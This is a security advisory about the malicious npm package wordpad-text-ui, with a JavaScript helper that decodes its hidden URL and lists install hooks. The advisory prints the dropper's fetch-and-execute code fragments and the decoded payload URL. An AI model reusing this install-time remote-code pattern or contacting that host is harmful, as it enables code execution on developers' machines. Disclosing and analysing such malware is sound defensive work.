wordpad-text-ui (npm)
Malicious code in wordpad-text-ui (npm)
Remove it immediately and rotate any exposed credentials.
What this malware does
On npm install, the declared postinstall hook runs node main.js. That script decodes an obfuscated URL stored as DEV_API_KEY="S]EH:2e2prf1uhshhnqrvm1zzz22=vswwk" (main.js line 15): the string is reversed and every character is shifted by -3, which yields https://www.jsonkeeper.com/b/7EBZP. It then fetches that URL with axios and writes the response body into the stdin of a detached node child process, which executes it (main.js lines 18-23: const s1 = (await axios.get(update(DEV_API_KEY))).data.content; const child = spawn('node', [], { detached: true,... }); child.stdin.write(s1); child.stdin.end(); child.unref();).

This is a classic install-time remote code execution dropper. Because the payload is hosted on an anonymous, mutable JSON paste service, it is attacker-controlled and can be swapped at any time without a new package version being published.

Supporting indicators reinforce malicious intent. The C2 URL is hidden behind a homemade reverse-plus-Caesar encoding under the misleading name DEV_API_KEY, an evasion tactic aimed at static scanners. The package name (wordpad-text-ui) implies a text-editor UI library, but index.js only throws an error telling consumers not to require it, while bootstrap.js, bundle.js, and publish.js are empty 0-byte decoys. The package ships no actual functionality and exists solely to deliver the dropper. It also pulls in a sibling package, richtext-editor-ui, that propagates the same campaign.
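An analyst helper, added here and not code from the wordpad-text-ui package or from the advisory, that reproduces the described deobfuscation (reverse the string, then shift each character code by -3) so the hidden URL can be confirmed from the quoted literal, and that lists install-time lifecycle hooks in a package manifest; the sample manifest is constructed, not the real package.json.

```javascript
// Literal quoted in the advisory (main.js line 15).
const DEV_API_KEY = "S]EH:2e2prf1uhshhnqrvm1zzz22=vswwk";

// Reverse the string, then shift every character code by `shift`.
// The shift is applied to the raw char code, which is why '=' becomes ':'
// and '2' becomes '/' in the decoded URL.
function decodeReverseCaesar(encoded, shift = -3) {
  return [...encoded]
    .reverse()
    .map((ch) => String.fromCharCode(ch.charCodeAt(0) + shift))
    .join("");
}

// Lifecycle scripts that npm executes automatically during install.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Return every non-empty install-time hook declared in a package manifest,
// so a reviewer can see which commands run before any code is required.
function findInstallHooks(manifest) {
  const scripts = (manifest && manifest.scripts) || {};
  return INSTALL_HOOKS
    .filter((hook) => typeof scripts[hook] === "string" && scripts[hook].trim() !== "")
    .map((hook) => ({ hook, command: scripts[hook] }));
}

// Constructed manifest mirroring the hook the advisory describes (hypothetical).
const sampleManifest = {
  name: "wordpad-text-ui",
  scripts: { postinstall: "node main.js" },
};

console.log(decodeReverseCaesar(DEV_API_KEY)); // https://www.jsonkeeper.com/b/7EBZP
console.log(findInstallHooks(sampleManifest));
```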
Malicious versions
Indicators of compromise (SHA-256)
Frequently asked questions
Campaign
References
Credits
- Amazon Inspector · finder